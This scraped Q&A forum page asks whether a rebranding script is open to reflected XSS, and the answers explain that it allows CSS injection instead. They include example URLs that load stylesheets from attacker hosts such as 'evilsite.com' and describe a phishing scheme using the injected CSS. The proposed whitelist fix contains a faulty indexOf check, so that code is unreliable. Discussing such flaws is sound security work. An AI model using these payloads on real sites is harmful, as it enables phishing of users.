Is this code vulnerable to Reflected XSS?
Clash Royale CLAN TAG#URR8PPP
.everyoneloves__top-leaderboard:empty,.everyoneloves__mid-leaderboard:empty margin-bottom:0;
up vote
4
down vote
favorite
I'm doing a pentest and came by this code:
(function()
var subdomain = (function()
var query = /[?&]css=([^&#]*)/i.exec(window.location.search);
if(query)
return query[1];
var URL = window.location.host.split('.');
if (URL.length > 1)
return URL[0];
)();
if (subdomain)
var link = document.createElement('link');
link.rel = "stylesheet";
link.href = "/" + subdomain + ".css";
document.getElementsByTagName('head')[0].appendChild(link);
)();
It adds a CSS file to the header for rebranding.
The target URL looks like this:http://some.company.com/p1=test&css=custom
We have controlled the subdomain
parameter here which equals to either query
or URL[0]
.query
is the result of /[?&]css=([^&#]*)/i.exec(window.location.search);
which equals to custom
in this case.
if the query
is not available in URL, then URL[0]
equals to some
here, I can't think of doing anything useful using URL[0]
because, in order to control its value, I have to change some
to something else which completely changes the URL and points to some other irrelevant page.
Anyway, The final CSS URL would be "/custom.css" or "/some.css" if the CSS
parameter is not available.
I tried some payloads to exploit this but all failed.
Any ideas if this code is vulnerable and how can it be exploited?
xss reflected-xss
add a comment |Â
up vote
4
down vote
favorite
I'm doing a pentest and came by this code:
(function()
var subdomain = (function()
var query = /[?&]css=([^&#]*)/i.exec(window.location.search);
if(query)
return query[1];
var URL = window.location.host.split('.');
if (URL.length > 1)
return URL[0];
)();
if (subdomain)
var link = document.createElement('link');
link.rel = "stylesheet";
link.href = "/" + subdomain + ".css";
document.getElementsByTagName('head')[0].appendChild(link);
)();
It adds a CSS file to the header for rebranding.
The target URL looks like this:http://some.company.com/p1=test&css=custom
We have controlled the subdomain
parameter here which equals to either query
or URL[0]
.query
is the result of /[?&]css=([^&#]*)/i.exec(window.location.search);
which equals to custom
in this case.
if the query
is not available in URL, then URL[0]
equals to some
here, I can't think of doing anything useful using URL[0]
because, in order to control its value, I have to change some
to something else which completely changes the URL and points to some other irrelevant page.
Anyway, The final CSS URL would be "/custom.css" or "/some.css" if the CSS
parameter is not available.
I tried some payloads to exploit this but all failed.
Any ideas if this code is vulnerable and how can it be exploited?
xss reflected-xss
1
//domain.tld/bad.css
is a potentially valid url. no xss, but a css injection potential.
â dandavis
2 days ago
add a comment |Â
up vote
4
down vote
favorite
up vote
4
down vote
favorite
I'm doing a pentest and came by this code:
(function()
var subdomain = (function()
var query = /[?&]css=([^&#]*)/i.exec(window.location.search);
if(query)
return query[1];
var URL = window.location.host.split('.');
if (URL.length > 1)
return URL[0];
)();
if (subdomain)
var link = document.createElement('link');
link.rel = "stylesheet";
link.href = "/" + subdomain + ".css";
document.getElementsByTagName('head')[0].appendChild(link);
)();
It adds a CSS file to the header for rebranding.
The target URL looks like this:http://some.company.com/p1=test&css=custom
We have controlled the subdomain
parameter here which equals to either query
or URL[0]
.query
is the result of /[?&]css=([^&#]*)/i.exec(window.location.search);
which equals to custom
in this case.
if the query
is not available in URL, then URL[0]
equals to some
here, I can't think of doing anything useful using URL[0]
because, in order to control its value, I have to change some
to something else which completely changes the URL and points to some other irrelevant page.
Anyway, The final CSS URL would be "/custom.css" or "/some.css" if the CSS
parameter is not available.
I tried some payloads to exploit this but all failed.
Any ideas if this code is vulnerable and how can it be exploited?
xss reflected-xss
I'm doing a pentest and came by this code:
(function()
var subdomain = (function()
var query = /[?&]css=([^&#]*)/i.exec(window.location.search);
if(query)
return query[1];
var URL = window.location.host.split('.');
if (URL.length > 1)
return URL[0];
)();
if (subdomain)
var link = document.createElement('link');
link.rel = "stylesheet";
link.href = "/" + subdomain + ".css";
document.getElementsByTagName('head')[0].appendChild(link);
)();
It adds a CSS file to the header for rebranding.
The target URL looks like this:http://some.company.com/p1=test&css=custom
We have controlled the subdomain
parameter here which equals to either query
or URL[0]
.query
is the result of /[?&]css=([^&#]*)/i.exec(window.location.search);
which equals to custom
in this case.
if the query
is not available in URL, then URL[0]
equals to some
here, I can't think of doing anything useful using URL[0]
because, in order to control its value, I have to change some
to something else which completely changes the URL and points to some other irrelevant page.
Anyway, The final CSS URL would be "/custom.css" or "/some.css" if the CSS
parameter is not available.
I tried some payloads to exploit this but all failed.
Any ideas if this code is vulnerable and how can it be exploited?
xss reflected-xss
xss reflected-xss
edited yesterday
R1-
8501724
8501724
asked 2 days ago
Sam
329111
329111
1
//domain.tld/bad.css
is a potentially valid url. no xss, but a css injection potential.
â dandavis
2 days ago
add a comment |Â
1
//domain.tld/bad.css
is a potentially valid url. no xss, but a css injection potential.
â dandavis
2 days ago
1
1
//domain.tld/bad.css
is a potentially valid url. no xss, but a css injection potential.â dandavis
2 days ago
//domain.tld/bad.css
is a potentially valid url. no xss, but a css injection potential.â dandavis
2 days ago
add a comment |Â
3 Answers
3
active
oldest
votes
up vote
10
down vote
accepted
Yes, this code is vulnerable, but not to XSS. The subdomain
variable's value can indeed be controlled by an attacker, but that variable is only used to set the href parameter of a CSS stylesheet; which won't accept JavaScript code. However, controlling this value does still allow CSS injection.
The stylesheet's href is prefixed by /
, but an attacker can still point it to an arbitrary page by adding another slash to form a protocol-relative URL pointing to the attacker's server. (E.g. //evilsite.com/payload.css
.) This would allow the attacker to get complete control over the site's appearance, if not it's functionality, which could be used to trick users into taking actions they wouldn't otherwise take. (For example, add a banner telling users they need to reset their password, then style the user settings page to make their public profile description field look like the input box for "current password".)
CSS might contain executable code - not for all browsers, but still.
â Bergi
2 days ago
add a comment |Â
up vote
5
down vote
Any ideas if this code is vulnerable and how can it be exploited?
As mentioned in the comments, this code could be vulnerable to CSS injection.
For example, if the URL looks like:
http://some.company.com/p1=test&css=/evil.com/more_evil
Then this javascript will create a new link in the header like:
link rel="stylesheet" href="//evil.com/more_evil.css"
Which is a valid URL (even without the scheme http/https), which can access the remote CSS file.
You could avoid this specific issue by changing the regex to: /[?&]css=([a-zA-z]*)/
â hft
2 days ago
add a comment |Â
up vote
1
down vote
It is vulnerable but you can solve that easily with whitelisting:
var allowedBrands = ['brand1', 'brand2', 'brand3'],
query = /[?&]css=([A-Za-z0-9]*)/i.exec(window.location.search);
if (query && allowedBrands.indexOf(query[1]))
return query[1];
else
return allowedBrands[0]; // this is the default value
New contributor
add a comment |Â
3 Answers
3
active
oldest
votes
3 Answers
3
active
oldest
votes
active
oldest
votes
active
oldest
votes
up vote
10
down vote
accepted
Yes, this code is vulnerable, but not to XSS. The subdomain
variable's value can indeed be controlled by an attacker, but that variable is only used to set the href parameter of a CSS stylesheet; which won't accept JavaScript code. However, controlling this value does still allow CSS injection.
The stylesheet's href is prefixed by /
, but an attacker can still point it to an arbitrary page by adding another slash to form a protocol-relative URL pointing to the attacker's server. (E.g. //evilsite.com/payload.css
.) This would allow the attacker to get complete control over the site's appearance, if not it's functionality, which could be used to trick users into taking actions they wouldn't otherwise take. (For example, add a banner telling users they need to reset their password, then style the user settings page to make their public profile description field look like the input box for "current password".)
CSS might contain executable code - not for all browsers, but still.
â Bergi
2 days ago
add a comment |Â
up vote
10
down vote
accepted
Yes, this code is vulnerable, but not to XSS. The subdomain
variable's value can indeed be controlled by an attacker, but that variable is only used to set the href parameter of a CSS stylesheet; which won't accept JavaScript code. However, controlling this value does still allow CSS injection.
The stylesheet's href is prefixed by /
, but an attacker can still point it to an arbitrary page by adding another slash to form a protocol-relative URL pointing to the attacker's server. (E.g. //evilsite.com/payload.css
.) This would allow the attacker to get complete control over the site's appearance, if not it's functionality, which could be used to trick users into taking actions they wouldn't otherwise take. (For example, add a banner telling users they need to reset their password, then style the user settings page to make their public profile description field look like the input box for "current password".)
CSS might contain executable code - not for all browsers, but still.
â Bergi
2 days ago
add a comment |Â
up vote
10
down vote
accepted
up vote
10
down vote
accepted
Yes, this code is vulnerable, but not to XSS. The subdomain
variable's value can indeed be controlled by an attacker, but that variable is only used to set the href parameter of a CSS stylesheet; which won't accept JavaScript code. However, controlling this value does still allow CSS injection.
The stylesheet's href is prefixed by /
, but an attacker can still point it to an arbitrary page by adding another slash to form a protocol-relative URL pointing to the attacker's server. (E.g. //evilsite.com/payload.css
.) This would allow the attacker to get complete control over the site's appearance, if not it's functionality, which could be used to trick users into taking actions they wouldn't otherwise take. (For example, add a banner telling users they need to reset their password, then style the user settings page to make their public profile description field look like the input box for "current password".)
Yes, this code is vulnerable, but not to XSS. The subdomain
variable's value can indeed be controlled by an attacker, but that variable is only used to set the href parameter of a CSS stylesheet; which won't accept JavaScript code. However, controlling this value does still allow CSS injection.
The stylesheet's href is prefixed by /
, but an attacker can still point it to an arbitrary page by adding another slash to form a protocol-relative URL pointing to the attacker's server. (E.g. //evilsite.com/payload.css
.) This would allow the attacker to get complete control over the site's appearance, if not it's functionality, which could be used to trick users into taking actions they wouldn't otherwise take. (For example, add a banner telling users they need to reset their password, then style the user settings page to make their public profile description field look like the input box for "current password".)
edited 2 days ago
answered 2 days ago
Ajedi32
2,61611347
2,61611347
CSS might contain executable code - not for all browsers, but still.
â Bergi
2 days ago
add a comment |Â
CSS might contain executable code - not for all browsers, but still.
â Bergi
2 days ago
CSS might contain executable code - not for all browsers, but still.
â Bergi
2 days ago
CSS might contain executable code - not for all browsers, but still.
â Bergi
2 days ago
add a comment |Â
up vote
5
down vote
Any ideas if this code is vulnerable and how can it be exploited?
As mentioned in the comments, this code could be vulnerable to CSS injection.
For example, if the URL looks like:
http://some.company.com/p1=test&css=/evil.com/more_evil
Then this javascript will create a new link in the header like:
link rel="stylesheet" href="//evil.com/more_evil.css"
Which is a valid URL (even without the scheme http/https), which can access the remote CSS file.
You could avoid this specific issue by changing the regex to: /[?&]css=([a-zA-z]*)/
â hft
2 days ago
add a comment |Â
up vote
5
down vote
Any ideas if this code is vulnerable and how can it be exploited?
As mentioned in the comments, this code could be vulnerable to CSS injection.
For example, if the URL looks like:
http://some.company.com/p1=test&css=/evil.com/more_evil
Then this javascript will create a new link in the header like:
link rel="stylesheet" href="//evil.com/more_evil.css"
Which is a valid URL (even without the scheme http/https), which can access the remote CSS file.
You could avoid this specific issue by changing the regex to: /[?&]css=([a-zA-z]*)/
â hft
2 days ago
add a comment |Â
up vote
5
down vote
up vote
5
down vote
Any ideas if this code is vulnerable and how can it be exploited?
As mentioned in the comments, this code could be vulnerable to CSS injection.
For example, if the URL looks like:
http://some.company.com/p1=test&css=/evil.com/more_evil
Then this javascript will create a new link in the header like:
link rel="stylesheet" href="//evil.com/more_evil.css"
Which is a valid URL (even without the scheme http/https), which can access the remote CSS file.
Any ideas if this code is vulnerable and how can it be exploited?
As mentioned in the comments, this code could be vulnerable to CSS injection.
For example, if the URL looks like:
http://some.company.com/p1=test&css=/evil.com/more_evil
Then this javascript will create a new link in the header like:
link rel="stylesheet" href="//evil.com/more_evil.css"
Which is a valid URL (even without the scheme http/https), which can access the remote CSS file.
answered 2 days ago
hft
1,001617
1,001617
You could avoid this specific issue by changing the regex to: /[?&]css=([a-zA-z]*)/
â hft
2 days ago
add a comment |Â
You could avoid this specific issue by changing the regex to: /[?&]css=([a-zA-z]*)/
â hft
2 days ago
You could avoid this specific issue by changing the regex to: /[?&]css=([a-zA-z]*)/
â hft
2 days ago
You could avoid this specific issue by changing the regex to: /[?&]css=([a-zA-z]*)/
â hft
2 days ago
add a comment |Â
up vote
1
down vote
It is vulnerable but you can solve that easily with whitelisting:
var allowedBrands = ['brand1', 'brand2', 'brand3'],
query = /[?&]css=([A-Za-z0-9]*)/i.exec(window.location.search);
if (query && allowedBrands.indexOf(query[1]))
return query[1];
else
return allowedBrands[0]; // this is the default value
New contributor
add a comment |Â
up vote
1
down vote
It is vulnerable but you can solve that easily with whitelisting:
var allowedBrands = ['brand1', 'brand2', 'brand3'],
query = /[?&]css=([A-Za-z0-9]*)/i.exec(window.location.search);
if (query && allowedBrands.indexOf(query[1]))
return query[1];
else
return allowedBrands[0]; // this is the default value
New contributor
add a comment |Â
up vote
1
down vote
up vote
1
down vote
It is vulnerable but you can solve that easily with whitelisting:
var allowedBrands = ['brand1', 'brand2', 'brand3'],
query = /[?&]css=([A-Za-z0-9]*)/i.exec(window.location.search);
if (query && allowedBrands.indexOf(query[1]))
return query[1];
else
return allowedBrands[0]; // this is the default value
New contributor
It is vulnerable but you can solve that easily with whitelisting:
var allowedBrands = ['brand1', 'brand2', 'brand3'],
query = /[?&]css=([A-Za-z0-9]*)/i.exec(window.location.search);
if (query && allowedBrands.indexOf(query[1]))
return query[1];
else
return allowedBrands[0]; // this is the default value
New contributor
New contributor
answered yesterday
MatÃas Pizarro
111
111
New contributor
New contributor
add a comment |Â
add a comment |Â
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
StackExchange.ready(
function ()
StackExchange.openid.initPostLogin('.new-post-login', 'https%3a%2f%2fsecurity.stackexchange.com%2fquestions%2f193397%2fis-this-code-vulnerable-to-reflected-xss%23new-answer', 'question_page');
);
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Post as a guest
Sign up or log in
StackExchange.ready(function ()
StackExchange.helpers.onClickDraftSave('#login-link');
);
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
Sign up using Google
Sign up using Facebook
Sign up using Email and Password
1
//domain.tld/bad.css
is a potentially valid url. no xss, but a css injection potential.â dandavis
2 days ago